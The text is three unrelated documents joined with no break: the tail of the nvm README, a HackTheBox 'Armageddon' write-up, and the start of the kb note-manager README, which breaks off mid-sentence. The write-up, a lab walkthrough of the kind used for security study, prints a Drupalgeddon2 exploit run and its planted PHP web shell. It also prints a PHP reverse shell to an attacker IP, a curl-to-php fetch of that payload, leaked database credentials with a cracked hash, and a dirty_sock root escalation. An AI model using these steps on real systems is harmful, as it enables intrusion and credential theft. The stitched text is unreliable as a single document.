from specific versions of Node like this: ```sh nvm install 6 --reinstall-packages-from=5 nvm install v4.2 --reinstall-packages-from=iojs ``` ### Default global packages from file while installing If you have a list of default packages you want installed every time you install a new version we support that too. You can add anything npm would accept as a package argument on the command line. ```sh # $NVM_DIR/default-packages rimraf object-inspect@1.0.2 stevemao/left-pad ``` ### io.js If you want to install [io.js](https://github.com/iojs/io.js/): ```sh nvm install iojs ``` If you want to install a new version of io.js and migrate npm packages from a previous version: ```sh nvm install iojs --reinstall-packages-from=iojs ``` The same guidelines mentioned for migrating npm packages in Node.js are applicable to io.js. ### System version of node If you want to use the system-installed version of node, you can use the special default alias "system": ```sh nvm use system nvm run system --version ``` ### Listing versions If you want to see what versions are installed: ```sh nvm ls ``` If you want to see what versions are available to install: ```sh nvm ls-remote ``` To restore your PATH, you can deactivate it: ```sh nvm deactivate ``` To set a default Node version to be used in any new shell, use the alias 'default': ```sh nvm alias default node ``` To use a mirror of the node binaries, set `$NVM_NODEJS_ORG_MIRROR`: ```sh export NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install node NVM_NODEJS_ORG_MIRROR=https://nodejs.org/dist nvm install 4.2 ``` To use a mirror of the io.js binaries, set `$NVM_IOJS_ORG_MIRROR`: ```sh export NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 NVM_IOJS_ORG_MIRROR=https://iojs.org/dist nvm install iojs-v1.0.3 ``` `nvm use` will not, by default, create a "current" symlink. Set `$NVM_SYMLINK_CURRENT` to "true" to enable this behavior, which is sometimes useful for IDEs. Note that using `nvm` in multiple shell tabs with this environment variable enabled can cause race conditions. ### .nvmrc You can create a `.nvmrc` file containing version number in the project root directory (or any parent directory). `nvm use`, `nvm install`, `nvm exec`, `nvm run`, and `nvm which` will all respect an `.nvmrc` file when a version is not supplied. For example, to make nvm default to the latest 5.9 release for the current directory: ```sh $ echo "5.9" > .nvmrc $ echo "lts/*" > .nvmrc # to default to the latest LTS version ``` Then when you run nvm: ```sh $ nvm use Found '/path/to/project/.nvmrc' with version <5.9> Now using node v5.9.1 (npm v3.7.3) ``` ### Deeper Shell Integration You can use [`avn`](https://github.com/wbyoung/avn) to deeply integrate into your shell and automatically invoke `nvm` when changing directories. `avn` is **not** supported by the `nvm` development team. Please [report issues to the `avn` team](https://github.com/wbyoung/avn/issues/new). If you prefer a lighter-weight solution, the recipes below have been contributed by `nvm` users. They are **not** supported by the `nvm` development team. We are, however, accepting pull requests for more examples. #### zsh ##### Calling `nvm use` automatically in a directory with a `.nvmrc` file Put this into your `$HOME/.zshrc` to call `nvm use` automatically whenever you enter a directory that contains an `.nvmrc` file with a string telling nvm which node to `use`: ```zsh # place this after nvm initialization! autoload -U add-zsh-hook load-nvmrc() { local node_version="$(nvm version)" local nvmrc_path="$(nvm_find_nvmrc)" if [ -n "$nvmrc_path" ]; then local nvmrc_node_version=$(nvm version "$(cat "${nvmrc_path}")") if [ "$nvmrc_node_version" = "N/A" ]; then nvm install elif [ "$nvmrc_node_version" != "$node_version" ]; then nvm use fi elif [ "$node_version" != "$(nvm version default)" ]; then echo "Reverting to nvm default version" nvm use default fi } add-zsh-hook chpwd load-nvmrc load-nvmrc ``` ## License nvm is released under the MIT license. Copyright (C) 2010-2017 Tim Caswell and Jordan Harband Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ## Running tests Tests are written in [Urchin]. Install Urchin (and other dependencies) like so: npm install There are slow tests and fast tests. The slow tests do things like install node and check that the right versions are used. The fast tests fake this to test things like aliases and uninstalling. From the root of the nvm git repository, run the fast tests like this: npm run test/fast Run the slow tests like this: npm run test/slow Run all of the tests like this: npm test Nota bene: Avoid running nvm while the tests are running. ## Bash completion To activate, you need to source `bash_completion`: ```sh [[ -r $NVM_DIR/bash_completion ]] && . $NVM_DIR/bash_completion ``` Put the above sourcing line just below the sourcing line for nvm in your profile (`.bashrc`, `.bash_profile`). ### Usage nvm: > $ nvm <kbd>Tab</kbd> ``` alias deactivate install ls run unload clear-cache exec list ls-remote unalias use current help list-remote reinstall-packages uninstall version ``` nvm alias: > $ nvm alias <kbd>Tab</kbd> ``` default ``` > $ nvm alias my_alias <kbd>Tab</kbd> ``` v0.6.21 v0.8.26 v0.10.28 ``` nvm use: > $ nvm use <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` nvm uninstall: > $ nvm uninstall <kbd>Tab</kbd> ``` my_alias default v0.6.21 v0.8.26 v0.10.28 ``` ## Compatibility Issues `nvm` will encounter some issues if you have some non-default settings set. (see [#606](/../../issues/606)) The following are known to cause issues: Inside `~/.npmrc`: ```sh prefix='some/path' ``` Environment Variables: ```sh $NPM_CONFIG_PREFIX $PREFIX ``` Shell settings: ```sh set -e ``` ## Installing nvm on Alpine Linux In order to provide the best performance (and other optimisations), nvm will download and install pre-compiled binaries for Node (and npm) when you run `nvm install X`. The Node project compiles, tests and hosts/provides pre-these compiled binaries which are built for mainstream/traditional Linux distributions (such as Debian, Ubuntu, CentOS, RedHat et al). Alpine Linux, unlike mainstream/traditional Linux distributions, is based on [busybox](https://www.busybox.net/), a very compact (~5MB) Linux distribution. Busybox (and thus Alpine Linux) uses a different C/C++ stack to most mainstream/traditional Linux distributions - [musl](https://www.musl-libc.org/). This makes binary programs built for such mainstream/traditional incompatible with Alpine Linux, thus we cannot simply `nvm install X` on Alpine Linux and expect the downloaded binary to run correctly - you'll likely see "...does not exist" errors if you try that. There is a `-s` flag for `nvm install` which requests nvm download Node source and compile it locally. If installing nvm on Alpine Linux *is* still what you want or need to do, you should be able to achieve this by running the following from you Alpine Linux shell: ```sh apk add -U curl bash ca-certificates openssl ncurses coreutils python2 make gcc g++ libgcc linux-headers grep util-linux binutils findutils curl -o- https://raw.githubusercontent.com/creationix/nvm/v0.33.6/install.sh | bash ``` The Node project has some desire but no concrete plans (due to the overheads of building, testing and support) to offer Alpine-compatible binaries. As a potential alternative, @mhart (a Node contributor) has some [Docker images for Alpine Linux with Node and optionally, npm, pre-installed](https://github.com/mhart/alpine-node). ## Docker for development environment To make the development and testing work easier, we have a Dockerfile for development usage, which is based on Ubuntu 14.04 base image, prepared with essential and useful tools for `nvm` development, to build the docker image of the environment, run the docker command at the root of `nvm` repository: ```sh $ docker build -t nvm-dev . ``` This will package your current nvm repository with our pre-defiend development environment into a docker image named `nvm-dev`, once it's built with success, validate your image via `docker images`: ```sh $ docker images REPOSITORY TAG IMAGE ID CREATED SIZE nvm-dev latest 9ca4c57a97d8 7 days ago 1.22 GB ``` If you got no error message, now you can easily involve in: ```sh $ docker run -it nvm-dev -h nvm-dev nvm@nvm-dev:~/.nvm$ ``` Please note that it'll take about 15 minutes to build the image and the image size would be about 1.2GB, so it's not suitable for production usage. For more information and documentation about docker, please refer to its official website: - https://www.docker.com/ - https://docs.docker.com/ ## Problems - If you try to install a node version and the installation fails, be sure to delete the node downloads from src (`~/.nvm/src/`) or you might get an error when trying to reinstall them again or you might get an error like the following: curl: (33) HTTP server doesn't seem to support byte ranges. Cannot resume. - Where's my `sudo node`? Check out [#43](https://github.com/creationix/nvm/issues/43) - After the v0.8.6 release of node, nvm tries to install from binary packages. But in some systems, the official binary packages don't work due to incompatibility of shared libs. In such cases, use `-s` option to force install from source: ```sh nvm install -s 0.8.6 ``` - If setting the `default` alias does not establish the node version in new shells (i.e. `nvm current` yields `system`), ensure that the system's node `PATH` is set before the `nvm.sh` source line in your shell profile (see [#658](https://github.com/creationix/nvm/issues/658)) ## Mac OS "troubleshooting" **nvm node version not found in vim shell** If you set node version to a version other than your system node version `nvm use 6.2.1` and open vim and run `:!node -v` you should see `v6.2.1` if you see your system version `v0.12.7`. You need to run: ```shell sudo chmod ugo-x /usr/libexec/path_helper ``` More on this issue in [dotphiles/dotzsh](https://github.com/dotphiles/dotzsh#mac-os-x). [1]: https://github.com/creationix/nvm.git [2]: https://github.com/creationix/nvm/blob/v0.33.6/install.sh [3]: https://travis-ci.org/creationix/nvm [4]: https://github.com/creationix/nvm/releases/tag/v0.33.6 [Urchin]: https://github.com/scraperwiki/urchin [Fish]: http://fishshell.com
<p align="center"><img src="src/banner.png" alt="Banner"></img></p> <p align="center">Creator: <a href="https://app.hackthebox.eu/profile/27897">bertolis</a></p> # Personal thoughts Easy and multi-way machine. We use Drupalgeddon2 (SA-CORE-2018-002) vuln to get a reverse shell. Then we abuse our sudo privileges by installing a malicious snap package payload. Hope you'll find it useful; if so, consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting my profile in HTB__. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img> </a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a> <br><br> Now, let me get right into it. --- # Recon As always, we start with nmap. ```bash nmap -sS -sC -sV -p- -T4 -O 10.10.10.233 ``` ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 82:c6:bb:c7:02:6a:93:bb:7c:cb:dd:9c:30:93:79:34 (RSA) | 256 3a:ca:95:30:f3:12:d7:ca:45:05:bc:c7:f1:16:bb:fc (ECDSA) |_ 256 7a:d4:b3:68:79:cf:62:8a:7d:5a:61:e7:06:0f:5f:33 (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-generator: Drupal 7 (http://drupal.org) | http-robots.txt: 36 disallowed entries (15 shown) | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt |_/LICENSE.txt /MAINTAINERS.txt |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Welcome to Armageddon | Armageddon ``` The only port open except `22/ssh` is `80/http`.<br> - `http-generator` is `Drupal 7`<br> - Supports PHP (look at the `http-server-header`) Good by far. Let's have a look at what is `Drupal` >Drupal is a free and open-source web content management framework written in PHP and distributed under the GNU General Public License. Drupal provides a back-end framework for at least 13% of the top 10,000 websites worldwide – ranging from personal blogs to corporate, political, and government sites. Okay, now ima go'n see the webpage. # 80/http ![](src/initialweb.png) A login form (bu not working for new registrants). ![](src/sources.png) In its source codes, there's a file named `CHANGELOG.txt`. ```bash ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> curl -s http://10.10.10.233/CHANGELOG.txt | head Drupal 7.56, 2017-06-21 ----------------------- - Fixed security issues (access bypass). See SA-CORE-2017-003. Drupal 7.55, 2017-06-07 ----------------------- - Fixed incompatibility with PHP versions 7.0.19 and 7.1.5 due to duplicate DATE_RFC7231 definition. - Made Drupal core pass all automated tests on PHP 7.1. ``` The last change on the version we see is moving to `7.56`. ```bash ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> searchsploit drupal 7.56 ----------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ----------------------------------------------------------------------------------- --------------------------------- Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Executio | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasp | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Exe | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py ----------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results ``` # Foothold: Drupalgeddon 2 `php/webapps/44449.rb` Let's try that one. ```bash ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> searchsploit -m php/webapps/44449.rb Exploit: Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution URL: https://www.exploit-db.com/exploits/44449 Path: /usr/share/exploitdb/exploits/php/webapps/44449.rb File Type: Ruby script, ASCII text, with CRLF line terminators Copied to: /root/hackthebox/armageddon/44449.rb ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> ruby 44449.rb ruby: warning: shebang line ending with \r may cause problems Usage: ruby drupalggedon2.rb <target> [--authentication] [--verbose] Example for target that does not require authentication: ruby drupalgeddon2.rb https://example.com Example for target that does require authentication: ruby drupalgeddon2.rb https://example.com --authentication ``` ```bash ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> ruby 44449.rb http://10.10.10.233/ ruby: warning: shebang line ending with \r may cause problems [*] --==[::#Drupalggedon2::]==-- -------------------------------------------------------------------------------- [i] Target : http://10.10.10.233/ -------------------------------------------------------------------------------- [+] Found : http://10.10.10.233/CHANGELOG.txt (HTTP Response: 200) [+] Drupal!: v7.56 -------------------------------------------------------------------------------- [*] Testing: Form (user/password) [+] Result : Form valid - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Clean URLs [!] Result : Clean URLs disabled (HTTP Response: 404) [i] Isn't an issue for Drupal v7.x -------------------------------------------------------------------------------- [*] Testing: Code Execution (Method: name) [i] Payload: echo OPOYLTOW [+] Result : OPOYLTOW [+] Good News Everyone! Target seems to be exploitable (Code execution)! w00hooOO! -------------------------------------------------------------------------------- [*] Testing: Existing file (http://10.10.10.233/shell.php) [i] Response: HTTP 404 // Size: 5 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - [*] Testing: Writing To Web Root (./) [i] Payload: echo PD9waHAgaWYoIGlzc2V0KCAkX1JFUVVFU1RbJ2MnXSApICkgeyBzeXN0ZW0oICRfUkVRVUVTVFsnYyddIC4gJyAyPiYxJyApOyB9 | base64 -d | tee shell.php [+] Result : <?php if( isset( $_REQUEST['c'] ) ) { system( $_REQUEST['c'] . ' 2>&1' ); } [+] Very Good News Everyone! Wrote to the web root! Waayheeeey!!! -------------------------------------------------------------------------------- [i] Fake PHP shell: curl 'http://10.10.10.233/shell.php' -d 'c=hostname' armageddon.htb>>id uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_t:s0 armageddon.htb>> ``` But we can't get a reverse shell from there, we face the following thing when we try. ``` [!] WARNING: Detected an known bad character (>) ``` Let's interact with the webshell directly and reverse connnect a shell.<br> First create a file named `shell`.<br> Put the followings inside the file. ```php <?php $sock=fsockopen("10.10.14.XX",2121);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes); ?> ``` Open a web server using `php`<br> Do the curl request as follows. ```bash ┌──(root💀f4T1H)-[~/hackthebox/armageddon] └─> curl -s http://10.10.10.233/shell.php -d 'c=curl 10.10.14.77/shell | php' PHP Warning: fsockopen(): unable to connect to 10.10.14.77:2121 (Permission denied) in - on line 1 PHP Warning: proc_open(): Descriptor item must be either an array or a File-Handle in - on line 1 ``` We got some error. Let's make it reverse connect to us from well known ports.<br> Change the port both in your nc listener and reverse shell. ![](src/shell.png) # Lateral Movement: MySQL We CAN NOT spawn a tty shell unfortunately. We find mysql credentials in one of the files by grepping recursively. ![](src/holdsql.png) ![](src/mysql.png) Interactive mysql console is not working properly (since we don't have a tty). So we execute our commands by giving the mysql executable as a parameter. ```bash sh-4.2$ mysql -h localhost -u drupaluser -pCQHEy@9M*m23gBVj -e "select * from drupal.users" <-u drupaluser -pCQHEy@9M*m23gBVj -e "select * from drupal.users" uid name pass mail theme signature signature_format created access login status timezone language picture init data 0 NULL 0 0 0 0 NULL 0 NULL 1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt admin@armageddon.eu filtered_html 1606998756 1607077194 1607076276 1 Europe/London 0 admin@armageddon.eu a:1:{s:7:"overlay";i:1;} ``` ```bash hashcat --example-hashes | less ``` ![](src/search.png) hashcat hash -m 7900 /usr/share/wordlists/rockyou.txt ``` $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt:booboo ``` We can now ssh into brucetherealadmin. # Privesc: `snapd` dirty_sock (CVE-2019-7304) ```bash [brucetherealadmin@armageddon ~]$ sudo -l Matching Defaults entries for brucetherealadmin on armageddon: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User brucetherealadmin may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/snap install * [brucetherealadmin@armageddon ~]$ ``` Okay, let's google about exploits related with sudo. I found that one rigth here: https://github.com/initstring/dirty_sock But we can't just execute that script as it does not work. I used the trojan in the dirty_sockv2.py and write a script in order to just execute and become root. You can find it [here](https://git.io/dirty_sock) ```bash [brucetherealadmin@armageddon shm]$ chmod u+x lpe.py [brucetherealadmin@armageddon shm]$ ./lpe.py [+] Creating file... [+] Writing base64 decoded trojan... [+] Installing malicious snap... dirty-sock 0.1 installed [+] Deleting snap package... [+] Granting setuid perms to bash as root... [+] Here comes the PoC: uid=0(root) gid=0(root) groups=0(root) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [+] Deleting the previously created user... [+] Becoming root... .bash-4.2> id uid=1000(brucetherealadmin) gid=1000(brucetherealadmin) euid=0(root) egid=0(root) groups=0(root),1000(brucetherealadmin) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 .bash-4.2> cut -c1-21 /root/root.txt ced45363f68f009277256 .bash-4.2> exit exit [+] Removing footprint... DONE! [brucetherealadmin@armageddon shm]$ ``` And we sucessfully pwned the box. ![](/src/gifs/pwned.gif) --- # Closing If you liked the writeup, please consider [suporting](https://www.buymeacoffee.com/f4T1H21) a student to get `OSCP` exam and __+respecting__ my profile in HTB. <a href="https://app.hackthebox.eu/profile/184235"> <img src="https://www.hackthebox.eu/badge/image/184235" alt="f4T1H"> </img> </a> <br> <a href="https://www.buymeacoffee.com/f4T1H21"> <img src="https://raw.githubusercontent.com/f4T1H21/f4T1H21/main/support.png" height="40" alt="Support"> </img> </a> # Resources |`Original dirty_sock`|https://github.com/initstring/dirty_sock| |:-|:-| |__`dirty_sock Remastered`__|__https://git.io/dirty_sock__| <br> ___-Written by f4T1H-___
<p align="center"> <img src="https://raw.githubusercontent.com/gnebbia/kb/main/img/kb_logo.png" width="200"/> </p> # kb. A minimalist knowledge base manager Author: gnc <nebbionegiuseppe@gmail.com> Copyright: © 2020, gnc Date: 2022-09-21 Version: 0.1.7 ## Purpose kb is a text-oriented minimalist command line knowledge base manager. kb can be considered a quick note collection and access tool oriented toward software developers, penetration testers, hackers, students or whoever has to collect and organize notes in a clean way. Although kb is mainly targeted on text-based note collection, it supports non-text files as well (e.g., images, pdf, videos and others). The project was born from the frustration of trying to find a good way to quickly access my notes, procedures, cheatsheets and lists (e.g., payloads) but at the same time, keeping them organized. This is particularly useful for any kind of student. I use it in the context of penetration testing to organize pentesting procedures, cheatsheets, payloads, guides and notes. I found myself too frequently spending time trying to search for that particular payload list quickly, or spending too much time trying to find a specific guide/cheatsheet for a needed tool. kb tries to solve this problem by providing you a quick and intuitive way to access knowledge. In few words kb allows a user to quickly and efficiently: - collect items containing notes,guides,procedures,cheatsheets into an organized knowledge base; - filter the knowledge base on different metadata: title, category, tags and others; - visualize items within the knowledge base with (or without) syntax highlighting; - grep through the knowledge base using regexes; - import/export an entire knowledge base; Basically, kb provides a clean text-based way to organize your knowledge. ## Installation **You should have Python 3.6 or above installed.** To install the most recent stable version of kb just type: ```sh pip install -U kb-manager ``` If you want to install the bleeding-edge version of kb (that may have some bugs) you should do: ```sh git clone https://github.com/gnebbia/kb cd kb pip install -r requirements.txt python setup.py install # or with pip pip install -U git+https://github.com/gnebbia/kb ``` **Tip** for GNU/Linux and MacOS users: For a better user experience, also set the following kb bash aliases: ```sh cat <<EOF > ~/.kb_alias alias kbl="kb list" alias kbe="kb edit" alias kba="kb add" alias kbv="kb view" alias kbd="kb delete --id" alias kbg="kb grep" alias kbt="kb list --tags" EOF echo "source ~/.kb_alias" >> ~/.bashrc source ~/.kb_alias ``` Please remember to upgrade kb frequently by doing: ```sh pip install -U kb-manager ``` ### Installation with homebrew To install using homebrew, use: ```sh brew tap gnebbia/kb https://github.com/gnebbia/kb.git brew install gnebbia/kb/kb ``` To upgrade with homebrew: ```sh brew update brew upgrade gnebbia/kb/kb ``` ### Installation from AUR Arch Linux users can install [kb](https://aur.archlinux.org/packages/kb) or [kb-git](https://aur.archlinux.org/packages/kb-git) with their favorite [AUR Helper](https://wiki.archlinux.org/index.php/AUR_helpers). Stable: ```sh yay -S kb ``` Dev: ```sh yay -S kb-git ``` ### Notes for Windows users Windows users should keep in mind these things: - DO NOT USE notepad as %EDITOR%, kb is not compatible with notepad, a reasonable alternative is notepad++; - %EDITOR% variable should ALWAYS be enclosed within double quotes; ```sh EDITOR=C:\Program Files\Editor\my cool editor.exe -> WRONG! EDITOR="C:\Program Files\Editor\my cool editor.exe" -> OK! ``` To set the "EDITOR" Environment variable by using cmd.exe, just issue the following commands, after having inserted the path to your desired text editor: ```sh set EDITOR="C:\path\to\editor\here.exe" setx EDITOR "\"C:\path\to\editor\here.exe\"" ``` To set the "EDITOR" Environment variable by using Powershell, just issue the following commands, after having inserted the path to your desired text editor: ```sh $env:EDITOR='"C:\path\to\editor\here.exe"' [System.Environment]::SetEnvironmentVariable('EDITOR','"C:\path\to\editor\here.exe"', [System.EnvironmentVariableTarget]::User) ``` #### Setting Aliases for cmd Open a cmd.exe terminal with administrative rights and paste the following commands: ```sh reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor" /v "AutoRun" /t REG_EXPAND_SZ /d "%USERPROFILE%\autorun.cmd" ( echo @echo off echo doskey kbl=kb list $* echo doskey kbe=kb edit $* echo doskey kba=kb add $* echo doskey kbv=kb view $* echo doskey kbd=kb delete --id $* echo doskey kbg=kb grep $* echo doskey kbt=kb list --tags $* )> %USERPROFILE%\autorun.cmd ``` #### Setting Aliases for Powershell Open a Powershell terminal and paste the following commands: ```sh @' function kbl { kb list $args } function kbe { kb edit $args } function kba { kb add $args } function kbv { kb view $args } function kbd { kb delete --id $args } function kbg { kb grep $args } function kbt { kb list --tags $args } '@ > $env:USERPROFILE\Documents\WindowsPowerShell\profile.ps1 ``` ## Docker A docker setup has been included to help with development. To install and start the project with docker: ```sh docker-compose up -d docker-compose exec kb bash ``` The container has the aliases included in its `.bashrc` so you can use kb in the running container as you would if you installed it on the host directly. The `./docker/data` directory on the host is bound to `/data` in the container, which is the image's working directly also. To interact with the container, place (or symlink) the files on your host into the `./docker/data` directory, which can then be seen and used in the `/data` directory in the container. ## Usage ### List artifacts #### List all artifacts contained in the kb knowledge base ```sh kb list # or if aliases are used: kbl ``` #### List all artifacts containing the string "zip" ```sh kb list zip # or if aliases are used: kbl zip ``` #### List all artifacts belonging to the category "cheatsheet" ```sh kb list --category cheatsheet # or kb list -c cheatsheet # or if aliases are used: kbl -c cheatsheet ``` #### List all the artifacts having the tags "web" or "pentest" ```sh kb list --tags "web;pentest" # or if aliases are used: kbl --tags "web;pentest" ``` #### List using "verbose mode" ```sh kb list -v # or if aliases are used: kbl -v ``` ### Add artifacts #### Add a file to the collection of artifacts ```sh kb add ~/Notes/cheatsheets/pytest # or if aliases are used: kba ~/Notes/cheatsheets/pytest ``` #### Add a file to the artifacts ```sh kb add ~/ssh_tunnels --title pentest_ssh --category "procedure" \ --tags "pentest;network" --author "gnc" --status "draft" ``` #### Add all files contained in a directory to kb ```sh kb add ~/Notes/cheatsheets/general/* --category "cheatsheet" ``` #### Create a new artifact from scratch ```sh kb add --title "ftp" --category "notes" --tags "protocol;network" # a text editor ($EDITOR) will be launched for editing ``` #### Create a new artifact from the output of another program ```sh kb add --title "my_network_scan" --category "scans" --body "$(nmap -T5 -p80 192.168.1.0/24)" ``` ### Delete artifacts #### Delete an artifact by ID ```sh kb delete --id 2 # or if aliases are used: kbd 2 ``` #### Delete multiple artifacts by ID ```sh kb delete --id 2 3 4 # or if aliases are used: kbd 2 3 4 ``` #### Delete an artifact by name ```sh kb delete --title zap --category cheatsheet ``` ### View artifacts #### View an artifact by id ```sh kb view --id 3 # or kb view -i 3 # or kb view 3 # or if aliases are used: kbv 3 ``` #### View an artifact by name ```sh kb view --title "gobuster" # or kb view -t "gobuster" # or kb view gobuster ``` #### View an artifact without colors ```sh kb view -t dirb -n ``` #### View an artifact within a text-editor ```sh kb view -i 2 -e # or if aliases are used: kbv 2 -e ``` ### Edit artifacts Editing artifacts involves opening a text editor. Hence, binary files cannot be edited by kb. The editor can be set by the "EDITOR" environment variable. #### Edit an artifact by id ```sh kb edit --id 13 # or kbe 13 # or if aliases are used: kbe 13 ``` #### Edit an artifact by name ```sh kb edit --title "git" --category "cheatsheet" # or kb edit -t "git" -c "cheatsheet" # or if git is unique as artifact kb edit git ``` ### Grep through artifacts #### Grep through the knowledge base ```sh kb grep "[bg]zip" # or if aliases are used: kbg "[bg]zip" ``` #### Grep (case-insensitive) through the knowledge base ```sh kb grep -i "[BG]ZIP" ``` #### Grep in "verbose mode" through the knowledge base ```sh kb grep -v "[bg]zip" ``` #### Grep through the knowledge base and show matching lines ```sh kb grep -m "[bg]zip" ``` ### Import/Export/Erase a knowledge base #### Export the current knowledge base To export the entire knowledge base, do: ```sh kb export ``` This will generate a .kb.tar.gz archive that can be later be imported by kb. If you want to export only data (so that it can be used in other software): ```sh kb export --only-data ``` This will export a directory containing a subdirectory for each category and within these subdirectories we will have all the artifacts belonging to that specific category. #### Import a knowledge base ```sh kb import archive.kb.tar.gz ``` **NOTE**: Importing a knowledge base erases all the previous data. Basically it erases everything and imports the new knowledge base. #### Erase the entire knowledge base ```sh kb erase ``` ### Manage Templates kb supports custom templates for the artifacts. A template is basically a file using the "toml" format, structured in this way: ```sh TITLES = [ "^#.*", "blue", ] WARNINGS = [ "!.*" , "yellow",] COMMENTS = [ ";;.*", "green", ] ``` Where the first element of each list is a regex and the second element is a color. Note that by default an artifact is assigned with the 'default' template, and this template can be changed too (look at "Edit a template" subsection). #### List available templates To list all available templates: ```sh kb template list ``` To list all the templates containing the string "theory": ```sh kb template list "theory" ``` #### Create a new template Create a new template called "lisp-cheatsheets", note that an example template will be put as example in the editor. ```sh kb template new lisp-cheatsheets ``` #### Delete a template To delete the template called "lisp-cheatsheets" just do: ```sh kb template delete lisp-cheatsheets ``` #### Edit a template To edit the template called "listp-cheatsheets" just do: ```sh kb template edit lisp-cheatsheets ``` #### Add a template We can also add a template from an already existing toml configuration file by just doing: ```sh kb template add ~/path/to/myconfig.toml --title myconfig ``` #### Change template for an artifact We can change the template for an existing artifact by ID by using the update command: ```sh kb update --id 2 --template "lisp-cheatsheets" ``` #### Apply a template to all artifacts of a category We can apply the template "lisp-cheatsheets" to all artifacts belonging to the category "lispcode" by doing: ```sh kb template apply "lisp-cheatsheets" --category "lispcode" ``` #### Apply a template to all artifacts having zip in their title We can apply the template "dark" to all artifacts having in their title the string "zip" (e.g., bzip, 7zip, zipper) by doing: ```sh kb template apply "dark" --title "zip" --extended-match # or kb template apply "dark" --title "zip" -m ``` We can always have our queries to "contain" the string by using the `--extended-match` option when using `kb template apply`. #### Apply a template to all artifacts having specific properties We can apply the template "light" to all artifacts of the category "cheatsheet" who have as author "gnc" and as status "OK" by doing: ```sh kb template apply "light" --category "cheatsheet" --author "gnc" --status "OK" ``` ### Integrating kb with other tools kb can be integrated with other tools. #### kb and rofi We can integrate kb with rofi, a custom mode has been developed accessible in the "misc" directory within this repository. We can launch rofi with this mode by doing: ```sh rofi -show kb -modi kb:/path/to/rofi-kb-mode.sh ``` ### Experimental #### Synchronize kb with a remote git repository Synchronization with a remote git repository is experimental at the moment. Anyway we can initialize our knowledge base to a created empty github/gitlab (other git service) repository by doing: ```sh kb sync init ``` We can then push our knowledge base to the remote git repository with: ```sh kb sync push ``` We can pull (e.g., from another machine) our 